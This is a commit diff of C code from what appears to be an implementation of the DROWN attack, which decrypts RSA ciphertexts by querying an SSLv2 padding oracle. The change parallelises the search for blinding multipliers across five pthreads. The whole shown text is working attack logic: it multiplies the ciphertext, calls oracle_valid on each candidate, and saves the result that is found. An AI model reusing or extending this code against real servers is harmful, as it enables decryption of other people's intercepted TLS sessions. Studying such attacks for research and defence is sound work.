1
1
#include <openssl/bn.h>
2
2
#include <openssl/err.h>
3
3
#include <openssl/ssl.h>
4
+ #include <pthread.h>
4
5
#include "decrypt.h"
5
6
#include "oracle.h"
6
7
@@ -63,19 +64,40 @@ int oracle_valid(drown_ctx *dctx, BIGNUM *c)
63
64
return 0 ;
64
65
}
65
66
66
- /*
67
- Finds a multiplier s, so that c * (s * l_1) ** e is valid
68
- Updates c, s, mt, l, ?
69
- */
70
- int find_multiplier (drown_ctx * dctx , BIGNUM * mt , BIGNUM * l_1 , BN_CTX * ctx , BIGNUM * ss )
67
+ #define NUM_THREADS 5
68
+
69
+ struct shared_data_t
71
70
{
72
- BIGNUM * c = dctx -> c ;
73
- BIGNUM * n = dctx -> n ;
74
- BIGNUM * e = dctx -> e ;
71
+ drown_ctx * dctx ;
72
+ BIGNUM * mt ;
73
+ BIGNUM * l_1 ;
74
+ BIGNUM * ss ;
75
+ pthread_mutex_t mutex ;
76
+ int done ;
77
+ int l ;
78
+ };
79
+
80
+ struct shared_data_t shared_data = {
81
+ .mutex = PTHREAD_MUTEX_INITIALIZER ,
82
+ };
83
+
84
+ void * find_multiplier_thread (void * data )
85
+ {
86
+ int num = (int )data ;
75
87
88
+ BIGNUM * c = shared_data .dctx -> c ;
89
+ BIGNUM * n = shared_data .dctx -> n ;
90
+ BIGNUM * e = shared_data .dctx -> e ;
91
+ BIGNUM * l_1 = shared_data .l_1 ;
92
+
93
+ BN_CTX * ctx = BN_CTX_new ();
76
94
BN_CTX_start (ctx );
77
- BIGNUM * inc = BN_CTX_get (ctx );
78
- BIGNUM * upperbits = BN_CTX_get (ctx );
95
+
96
+ BIGNUM * inc = BN_CTX_get (ctx );
97
+ BIGNUM * mt = BN_CTX_get (ctx );
98
+ BN_copy (mt , shared_data .mt );
99
+ BIGNUM * ss = BN_CTX_get (ctx );
100
+ BIGNUM * upperbits = BN_CTX_get (ctx );
79
101
BIGNUM * se = BN_CTX_get (ctx );
80
102
BIGNUM * l_1e = BN_CTX_get (ctx );
81
103
BIGNUM * cl_1e = BN_CTX_get (ctx );
@@ -88,10 +110,21 @@ int find_multiplier(drown_ctx *dctx, BIGNUM *mt, BIGNUM *l_1, BN_CTX *ctx, BIGNU
88
110
// We will try every value of s, so we will add instead of multiplying
89
111
// Compute our increment
90
112
BN_mod_mul (inc , mt , l_1 , n , ctx );
91
- BN_zero (mt );
113
+
114
+ // Since we have several threads, each one will test the values of s in {num + i * NUM_THREADS}
115
+ BIGNUM * ii = BN_new ();
116
+ BN_set_word (ii , num );
117
+ BIGNUM * nn = BN_new ();
118
+ BN_set_word (nn , NUM_THREADS );
119
+ BN_mod_mul (mt , inc , ii , n , ctx );
120
+ BN_mod_mul (inc , inc , nn , n , ctx );
121
+ BN_free (ii );
122
+ BN_free (nn );
123
+
92
124
93
125
// Search multiplier
94
- for (unsigned long s = 1 ; l == 0 ; s ++ )
126
+ unsigned long s ;
127
+ for (s = num + NUM_THREADS ; l == 0 && !shared_data .done ; s += NUM_THREADS )
95
128
{
96
129
BN_mod_add (mt , mt , inc , n , ctx );
97
130
// Check if the upper bits are 0x0002
@@ -103,17 +136,52 @@ int find_multiplier(drown_ctx *dctx, BIGNUM *mt, BIGNUM *l_1, BN_CTX *ctx, BIGNU
103
136
BN_mod_exp (se , ss , e , n , ctx );
104
137
BN_mod_mul (cc , cl_1e , se , n , ctx );
105
138
106
- l = oracle_valid (dctx , cc );
139
+ l = oracle_valid (shared_data . dctx , cc );
107
140
}
108
141
}
109
142
110
- BN_copy (c , cc );
143
+ if (l )
144
+ {
145
+ pthread_mutex_lock (& shared_data .mutex );
146
+ if (!shared_data .done )
147
+ {
148
+ shared_data .done = 1 ;
149
+ // We found a result, save it
150
+ BN_copy (c , cc );
151
+ BN_copy (shared_data .mt , mt );
152
+ BN_copy (shared_data .ss , ss );
153
+ shared_data .l = l ;
154
+ }
155
+ pthread_mutex_unlock (& shared_data .mutex );
156
+ }
111
157
112
158
BN_CTX_end (ctx );
159
+ BN_CTX_free (ctx );
160
+
161
+ return NULL ;
162
+ }
163
+
164
+ int threaded_find_multiplier (drown_ctx * dctx , BIGNUM * mt , BIGNUM * l_1 , BN_CTX * ctx , BIGNUM * ss )
165
+ {
166
+ pthread_t tids [NUM_THREADS ];
167
+
168
+ shared_data .dctx = dctx ;
169
+ shared_data .mt = mt ;
170
+ shared_data .l_1 = l_1 ;
171
+ shared_data .ss = ss ;
172
+ shared_data .done = 0 ;
173
+
174
+ for (int i = 0 ; i < NUM_THREADS ; i ++ )
175
+ pthread_create (& tids [i ], NULL , find_multiplier_thread , (void * )i );
113
176
114
- return l ;
177
+ for (int i = 0 ; i < NUM_THREADS ; i ++ )
178
+ pthread_join (tids [i ], NULL );
179
+
180
+ return shared_data .l ;
115
181
}
116
182
183
+
184
+
117
185
/*
118
186
We have c0 = m0 ** e (mod n)
119
187
m0 = PKCS_1_v1.5_pad(k)), with |k| = ksize
@@ -160,7 +228,7 @@ void decrypt(drown_ctx *dctx)
160
228
BN_mod_inverse (l_1 , l_1 , n , ctx );
161
229
162
230
// Find a multiplier
163
- l = find_multiplier (dctx , mt , l_1 , ctx , ss );
231
+ l = threaded_find_multiplier (dctx , mt , l_1 , ctx , ss );
164
232
165
233
// Remember our multiplier
166
234
BN_mod_mul (S , S , ss , n , ctx );
0 commit comments